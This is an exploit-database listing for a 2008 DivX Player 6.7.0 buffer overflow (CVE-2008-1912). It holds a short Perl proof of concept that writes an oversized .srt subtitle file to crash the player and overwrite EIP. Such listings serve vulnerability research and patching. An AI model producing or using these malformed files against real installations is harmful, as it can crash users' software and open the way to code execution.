[] NeoSense
E X P L O I T S
title author type platform port cve id

DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)

Author: securfrog
type: dos
platform: windows
port: 
date_added: 2008-04-14 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44402;CVE-2008-1912 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdivx67.exe
# DIVX Player <= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl
my $file="MOVIE_FILENAME.srt";

my $payload = "A" x 4096;

open( $file, ">>$file") or die "Cannot open $file: $!";

print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;

close($file);

print "$file has been created \n";

# milw0rm.com [2008-04-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.